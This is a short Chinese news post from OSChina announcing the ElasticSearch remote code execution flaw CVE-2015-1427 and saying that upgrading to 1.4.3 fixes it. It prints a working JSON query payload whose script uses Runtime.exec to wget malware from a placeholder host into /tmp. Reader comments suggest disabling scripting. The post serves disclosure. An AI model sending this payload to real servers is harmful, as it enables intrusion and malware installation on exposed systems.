ElasticSearch 远程代码执行漏洞 CVE-2015-1427 - 开源中国社区
Float_left Icon_close
ElasticSearch 远程代码执行漏洞 CVE-2015-1427
oschina 2015年05月18日

ElasticSearch 远程代码执行漏洞 CVE-2015-1427

oschina oschina 发布于2015年05月18日 收藏 11 评论 2

【腾讯云】0基础建站 网站模板9元起! >>>  

ElasticSearch 提供了一个扩展 JSON API ,提供搜索以及系统管理的功能。该 API 日前爆出编号为 CVE-2015-1427 的远程代码执行漏洞,该漏洞源于一篇博客的介绍,请看 here (translated).

可通过升级到 1.4.3 或者更新版本来修复这个漏洞。否则如果你的 ElasticSearch 暴露在互联网就可能通过如下代码来执行远程代码:

{"query":
    {"filtered": {
        "query": {"match_all": {}}}},
        "script_fields": {"exp": {
            "script": "import java.util.*;import java.io.*;String str = \"\";BufferedReader br = new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec(\"wget -O /tmp/malware http://x.x.x.x/malware \").getInputStream()));StringBuilder sb = new StringBuilder();while((str=br.readLine())!=null){sb.append(str);sb.append(\"\r\n\");}sb.toString();"
    }}}

关于该漏洞的详细介绍和原理请看此文

本站文章除注明转载外,均为本站原创或编译。欢迎任何形式的转载,但请务必注明出处,尊重他人劳动共创开源社区。
转载请注明:文章转载自 开源中国社区 [http://www.oschina.net]
本文标题:ElasticSearch 远程代码执行漏洞 CVE-2015-1427
分享
评论(2)
最新评论
0
- - 禁止掉脚本
0
其实,我都不赞同查询语句中加入“ script” 这样的特征。
顶部